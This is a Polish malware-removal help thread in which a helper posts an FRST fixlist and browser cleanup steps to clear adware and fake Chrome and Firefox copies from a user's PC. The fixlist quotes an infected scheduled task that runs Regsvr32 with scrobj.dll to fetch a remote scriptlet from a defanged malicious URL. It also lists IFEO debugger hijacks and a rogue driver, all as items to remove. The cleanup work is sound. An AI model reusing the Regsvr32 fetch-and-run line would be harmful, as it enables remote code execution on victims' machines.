bikerxc Opublikowano 30 Maja 2017 Zgłoś Udostępnij Opublikowano 30 Maja 2017 (edytowane) Cześć, próbuję usunąć BigFarm i dodatki, czyli mod firefoxa w postaci searchinme oraz luckystar do chrome i co kilka dni problem powraca. Combofix, Adwcleaner, NOD32 nie dają rady z tym syfem. Proszę o pomoc adwcleaner.txt frst.txt gmer.txt combofix.txt Addition.txt Shortcut.txt Edytowane 30 Maja 2017 przez Rucek Logi uzupełnione. Sprzątam. Teraz czekamy. Odnośnik do komentarza
Miszel03 Opublikowano 31 Maja 2017 Zgłoś Udostępnij Opublikowano 31 Maja 2017 Pomieszałeś raporty (FRST jest taki sam jak Addition). Wygeneruj nowe i załącz je dokładnie, nie zmieniając ich zawartości. Odnośnik do komentarza
bikerxc Opublikowano 31 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 31 Maja 2017 Pomieszałeś raporty (FRST jest taki sam jak Addition). Wygeneruj nowe i załącz je dokładnie, nie zmieniając ich zawartości. Tu są oryginalne 3 logi z wczoraj Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 31 Maja 2017 Zgłoś Udostępnij Opublikowano 31 Maja 2017 Teraz raporty są w porządku. Widać rozmaite infekcje adware oraz fałszywe przeglądarki, które podszywają się pod oryginalne, zainstalowane (oprócz FireFox'a, którego nie ma zainstalowanego w oryginalnej wersji). Portale z oprogramowaniem / Instalatory - na co uważać 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: Task: {59BEB99E-C271-4376-BDB0-276EA360A713} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj83FURWRjqcMUEcRYI1NYM3FjzLMjH2FdZYRYIxRWqdRH== scrobj.dll C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Lareco\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk RemoveDirectory: C:\Program Files (x86)\Setleaf RemoveDirectory: C:\Users\Lareco\AppData\Local\Setleaf RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Setleaf FirewallRules: [{E75FFA4B-FC78-4CA5-BE2B-43940E08283B}] => (Allow) C:\Program Files (x86)\Setleaf\Application\chrome.exe FirewallRules: [{AE24E800-7B9F-4513-868E-B8212938ABEB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{563DD3A2-248E-4668-9278-5F1B363839D7}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Lareco\AppData\Local\Firefox RemoveDirectory: C:\Users\Lareco\AppData\Roaming\Firefox Winlogon\Notify\ScCertProp: wlnotify.dll [X] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-3868839101-544848183-1789199905-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope - brak wartości SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] S2 InstallerService; "C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe" [X] S3 catchme; \??\C:\ComboFix\catchme.sys [X] U3 pxldqpow; \??\C:\Users\Lareco\AppData\Local\Temp\pxldqpow.sys [X] 2017-05-24 12:10 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\55 2017-05-24 12:09 - 2017-05-24 12:09 - 00000042 _____ C:\Windows\SysWOW64\GZ 2017-05-11 15:10 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-11 15:09 - 2017-05-24 12:10 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\11 2017-05-11 15:09 - 2017-05-24 12:09 - 00000000 _____ C:\Windows\SysWOW64\00 2017-05-11 15:09 - 2017-05-18 09:09 - 00000000 _____ C:\Windows\SysWOW64\1111111 C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Lareco\AppData\Local\Mozilla\Firefox C:\Users\Lareco\AppData\Roaming\Mozilla\Firefox C:\Users\Lareco\AppData\Roaming\Profiles EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść i zabezpiecz przeglądarki. Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 3. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). betleaf;firefox;biaoJi Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 4. Upewnij się, że AdwCleaner już niczego nie wykrywa. Ewentualne detekcję daj do kasacji. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
bikerxc Opublikowano 31 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 31 Maja 2017 Zrobiłem tylko pkt 1 i po restarcie nadal mam chrome na pulpicie ze wskazaniem na :"C:\Program Files (x86)\Setleaf\Application\chrome.exe" zrobiłem nowe raporty. Możliwe, że od ostatniego skanu coś się pozmieniało. W załączeniu log z wykonanego pkt 1 Addition.txt FRST.txt Shortcut.txt Fixlog.txt Odnośnik do komentarza
Miszel03 Opublikowano 31 Maja 2017 Zgłoś Udostępnij Opublikowano 31 Maja 2017 Gdzie plik SearchReg? Czy AdwCleaner coś wykrył? Rób moje zlecenia wolniej, ale dokładniej, bo tylko marnujesz mój czas. Odnośnik do komentarza
bikerxc Opublikowano 31 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 31 Maja 2017 Gdzie plik SearchReg? Czy AdwCleaner coś wykrył? Rób moje zlecenia wolniej, ale dokładniej, bo tylko marnujesz mój czas. Nie przeszedłem do pkt 3 bo w pkt 2 skrót do Chrome nadal odwołuje się do zainfekowanej przeglądarki, dlatego też wolałem się upewnić, że wszystko jest ok i wygenerowałem logi i wrzuciłem tutaj. Nie do końca wiem jak mam realizować pkt 2 skoro skrót odwołuje się do zainfekowanej przeglądarki. Oczywiście mogę uruchomić ją z execa ale pytanie czy właśnie tak mam to zrobić? W załączeniu searchreg SearchReg.txt Odnośnik do komentarza
Miszel03 Opublikowano 31 Maja 2017 Zgłoś Udostępnij Opublikowano 31 Maja 2017 Skrypt (pkt. 1) nie wykonał się, wykonaj go jeszcze raz, ale czekaj cierpliwie i nie przerywaj tego procesu. Jeśli nadal się nie wykona (= będą skróty) to zrobisz to z poziomu Trybu awaryjnego (klik w F8 przed startem systemu). Odnośnik do komentarza
bikerxc Opublikowano 31 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 31 Maja 2017 Skrypt (pkt. 1) nie wykonał się, wykonaj go jeszcze raz, ale czekaj cierpliwie i nie przerywaj tego procesu. Jeśli nadal się nie wykona (= będą skróty) to zrobisz to z poziomu Trybu awaryjnego (klik w F8 przed startem systemu). I właśnie tego się obawiałem, że skrypt się nie wykonał. Pomimo tego zrealizowałem pozostałe punkty (nie było jeszcze Twojej odpowiedzi) i czekam na restart po adwcleanerze - wykrył infekcje i je usuwa. Tak czy siak uruchomię całość od nowa. Wykonałem pełną naprawę zgodnie z opisem. Logi poniżej Addition.txt AdwCleanerS15.txt Fixlog.txt FRST.txt SearchReg.txt Shortcut.txt Odnośnik do komentarza
bikerxc Opublikowano 1 Czerwca 2017 Autor Zgłoś Udostępnij Opublikowano 1 Czerwca 2017 Wygląda na to, że problem infekcji rozwiązany. Serdecznie dziękuję za pomoc. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się